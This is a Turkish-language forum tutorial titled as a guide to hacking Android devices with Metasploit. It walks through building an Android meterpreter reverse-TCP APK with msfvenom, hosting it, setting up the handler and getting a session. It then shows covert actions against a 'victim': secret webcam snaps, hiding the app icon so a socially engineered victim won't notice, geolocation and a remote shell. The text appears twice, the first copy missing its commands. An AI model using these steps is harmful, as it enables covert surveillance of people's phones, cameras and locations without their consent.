Métasploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapkyı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: inet = 192.168.1.41 IP adresimizi öğreniyoruz.
![](https://i.hizliresim.com/86pMbA.png)
Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapkmızı oluşturuyouz.
msfvenom p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN
Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.
![](https://i.hizliresim.com/lQnd9B.png)
Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.
![](https://i.hizliresim.com/M1q0Wk.png)
Daha sonra Met@sploiti açıyoruz.
![](https://i.hizliresim.com/jql8j9.png)
Aşağıdaki komutu yazarak payloadımızı seçiyoruz.
Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.
Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.
Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.
![](https://i.hizliresim.com/gPmqVZ.png)
Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apkyı indiriyoruz, kuruyoruz daha sonra da açıyoruz.
![](https://i.hizliresim.com/r0P381.png)
Bağlantı alınca komut satırımız geliyor zaten.
Komut satırımıza aşağıdaki komutu yazıyoruz.
Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.
Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.
sessions i OTURUM_NUMARASI
Örn:
Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.
![](https://i.hizliresim.com/qA7b8Q.png)
Örnekler;
app_list yazarak yüklü olan uygulamaları listeleyebiliriz.
![](https://i.hizliresim.com/bvNrM0.png)
webcam_snap diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.
[url=https://hizliresim.com/AOBL6r][img]https://i.hizliresim.com/AOBL6r.jpg[/img][/url]
![](https://i.hizliresim.com/00O1mo.png)
hide_app_icon diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.![😊 😊](https://cdn.jsdelivr.net/joypixels/assets/8.0/png/unicode/64/1f60a.png)
[url=https://hizliresim.com/zGd3l9][img]https://i.hizliresim.com/zGd3l9.png[/img][/url]
![](https://i.hizliresim.com/Rgd0oa.png)
geolocate komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.
shell komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.
![](https://i.hizliresim.com/QPbaZG.jpg)
NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
Videolu Anlatım:
https://www.youtube.com/watch?v=YRm-St0bJhU
Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: inet = 192.168.1.41 IP adresimizi öğreniyoruz.
Kod:
ifconfig
![](https://i.hizliresim.com/86pMbA.png)
Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapkmızı oluşturuyouz.
msfvenom p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN
Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.
Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk
![](https://i.hizliresim.com/lQnd9B.png)
Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.
Kod:
service apache2 start
Kod:
service apache2 status
![](https://i.hizliresim.com/M1q0Wk.png)
Daha sonra Met@sploiti açıyoruz.
Kod:
msfconsole
![](https://i.hizliresim.com/jql8j9.png)
Aşağıdaki komutu yazarak payloadımızı seçiyoruz.
Kod:
set payload android/meterpreter/reverse_tcp
Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.
Kod:
show options
Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.
Kod:
set LHOST 192.168.1.41
Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.
Kod:
exploit
![](https://i.hizliresim.com/gPmqVZ.png)
Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apkyı indiriyoruz, kuruyoruz daha sonra da açıyoruz.
![](https://i.hizliresim.com/r0P381.png)
Bağlantı alınca komut satırımız geliyor zaten.
Komut satırımıza aşağıdaki komutu yazıyoruz.
Kod:
background
Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.
Kod:
sessions
Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.
sessions i OTURUM_NUMARASI
Örn:
Kod:
sessions i 2
Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.
Kod:
help
![](https://i.hizliresim.com/qA7b8Q.png)
Örnekler;
app_list yazarak yüklü olan uygulamaları listeleyebiliriz.
![](https://i.hizliresim.com/bvNrM0.png)
webcam_snap diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.
[url=https://hizliresim.com/AOBL6r][img]https://i.hizliresim.com/AOBL6r.jpg[/img][/url]
![](https://i.hizliresim.com/00O1mo.png)
hide_app_icon diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.
![😊 😊](https://cdn.jsdelivr.net/joypixels/assets/8.0/png/unicode/64/1f60a.png)
[url=https://hizliresim.com/zGd3l9][img]https://i.hizliresim.com/zGd3l9.png[/img][/url]
![](https://i.hizliresim.com/Rgd0oa.png)
geolocate komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.
shell komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.
![](https://i.hizliresim.com/QPbaZG.jpg)
NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
Videolu Anlatım:
https://www.youtube.com/watch?v=YRm-St0bJhU
Son düzenleme: